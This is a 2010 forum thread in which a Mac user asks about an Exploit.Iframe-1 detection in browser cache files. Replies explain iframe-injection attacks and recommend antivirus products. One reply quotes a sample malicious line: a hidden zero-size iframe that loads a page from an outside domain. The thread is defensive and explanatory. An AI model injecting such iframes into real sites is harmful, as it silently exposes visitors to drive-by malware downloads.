Would like second opinion on Exploit.Iframe-1

Discussion in 'malware problems & news' started by Carbonyl, Feb 10, 2010.

Thread Status:
Not open for further replies.
  1. Carbonyl

    Carbonyl Registered Member

    Joined:
    May 19, 2009
    Posts:
    256
    Hi everyone,

    I have a quick question regarding something that came up with my OS X (10.6.2) machine this morning. I should say that I run ClamXAV on my OS X box, mainly because I find most other security solutions for OS X rather expensive.

    I was browsing some familiar and trusted websites (in Opera 10.1, javascript whitelisted only for trusted sites, via site preferences) when ClamXAV came back with a quarantine warning for: Exploit.Iframe-1

    The files it found and quarantined (opr0TRGU, opr0TRLF, opr0TRMB, opr0TRMH) were found in the /Library/Caches/Opera/cache/ directory. I deleted them all, though before that I submitted to VirusTotal. Only ClamAV had a hit on them.

    I asked around on a few other forums - The answer I received was that "Exploit.iFrame is a trojan that can be attached to web pages or to an email... This is a Windows virus and cannot infect your Mac". I accepted that answer at first, but the more I think on it, the more I realize that iFrame attacks should be platform independent.

    A full scan with ClamXAV turned up clean. Are there any other steps I ought to take to ensure this problem is taken care of? Is there any lingering risk after purging the quarantined files? Any advice would be appreciated. I have an OK handle on my Windows machine, but OS X security is still new to me.

    Thanks!
     
  2. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,943
    Location:
    California
    Exploit.Iframe is a generic description for exploits that inject i-frames into web sites, SQL injection being a common method. Typical code:

    Code:
    <IFRAME SRC="HTTP://www.{REMOVED}.cn/1.htm" WIDTH=0 HEIGHT=0></IFRAME>
    Here is McAfee's definition and analysis of an old one:

    http://vil.nai.com/vil/content/v_101203.htm

    The cached pages have exploit code targeting various Windows, Internet Explorer, and other application vulnerabilities, as shown above. If there are no exploitable vulnerabilities, the pages just sit in the cache and do nothing.

    Opera's cache files no longer include file extensions, but the ones you found are probably .htm and .js with different malicious codes inside. The usual payload is a trojan executable that is downloaded to the victim's machine, as shown in the McAfee example.

    In your case, these pages were quarantined, which, I assume, means they could not execute any code, even if a Mac OS or application vulnerability were present. If the deleted pages are still in your Trash, you can retrieve them, Zip them, and send them to McAfee or another vendor for analysis. I would be surprised if they were other than Windows exploits.

    Does your ClamAV have a forum?

    ----
    rich


    REFERENCES

    Another exploit:

    Exploit-Iframe.gen.s
    http://vil.nai.com/vil/content/v_212507.htm

    Web Hosts with infected sites:

    Exploit iframe malicious code
    http://tipsbucket.blogspot.com/2009/05/exploit-iframe-malicious-code.html
     
  3. Carbonyl

    Carbonyl Registered Member

    Joined:
    May 19, 2009
    Posts:
    256
    Thanks very much for the information Rmus! Once again you prove an exceptional source of knowledge on these forums.

    Unfortunately I purged all of these cache files before I could send them for analysis. They rather gave me a scare - I decided to look inside of them for the offending iFrame links to block the domains at the HOSTS level, but found yet ANOTHER stupid OS X security practice: Apparently TextEdit opens and parses HTML (and maybe javascript? Not sure) by default, so I unwittingly opened and executed whatever code was in those cache files. Shoulda used Pico!

    Anyhow, ClamXAV does have a forum, but my questions there have gone unanswered, and don't look to be on anyone's priority list.

    The bottom line seems to be that the malicious iFrame links will download and execute code that probably doesn't target OS X, but I suppose there's no way to be sure of that. Still, it seems pretty likely that the vulnerabilities targeted are Windows-based ones, though probably updated from 2008. ClamXAV hasn't found anything since, though I may try to find an alternative scanner to back this up, as I'm unsure of how to proceed.
     
  4. SweX

    SweX Registered Member

    Joined:
    Apr 21, 2007
    Posts:
    6,429
    Hi Carbonyl!

    If you want you can try out ESET's Antivirus BETA for OS X here.
    http://beta.eset.com/macosx

    And it protects you from Mac, Windows, and Linux Malware.
    And it is free of use as long as the Beta program is going on.

    ClamXAV only protects your Mac from Mac malware.

    Even if the Windows and Linux Malware cannot harm your Mac, I am sure you would not want them to come into your Mac anyway.

    Edit: BTW I don't think ESET's NOD32 OS X version will be too expensive when it leaves Beta status :)
     
    Last edited: Feb 11, 2010
  5. Blueshoes

    Blueshoes Registered Member

    Joined:
    Feb 13, 2010
    Posts:
    220
    Carbonyl,

    Intego is the Gold Standard for Mac anti-malware programs. ClamX has only 5 of the 13 trojans in its database. The database includes PC definitions. PCTools iAntivirus is basically dead. Symantec bought it, and a couple of weeks after, updates became almost nonexistent. Avast is too lazy to look for any Trojans and asks people in forums to send the most common trojans for OS X.

    Intego just came out with Virusbarrier X6 with an advanced firewall and lowered their prices and added a 2-Mac personal pack and a 5-Mac family pack!!!!!!!!!!! No one beats Intego.
     
  6. Carbonyl

    Carbonyl Registered Member

    Joined:
    May 19, 2009
    Posts:
    256
    Thanks for the tip there, Swex! I didn't know ESET were getting into the OS X game at all. I quite like ESET's NOD for my Windows machines, so I decided to give this a try for my OS X machine.

    Wow - All I can say is, there's a reason this is still in beta! Phew! I think I'll steer clear until they figure out how to reduce overhead and conflicts.

    Blueshoes, thanks for the tip. I'm sure Intego is quite effective, but they're also a touch too expensive for me at the moment!

    I do appreciate the advice from both of you, but I was really asking more about the specific threat I encountered than asking what security solution I should be relying on.
     
  7. SweX

    SweX Registered Member

    Joined:
    Apr 21, 2007
    Posts:
    6,429
    @Carbonyl
    Wow - All I can say is, there's a reason this is still in beta! Phew! I think I'll steer clear until they figure out how to reduce overhead and conflicts.


    Hmmm... that's sad to hear. I don't own a Mac myself yet so I haven't been able to try the Beta out. :)

    But please be sure to report any conflicts/problems you have seen to ESET so they can fix them before I try it out myself ;)
     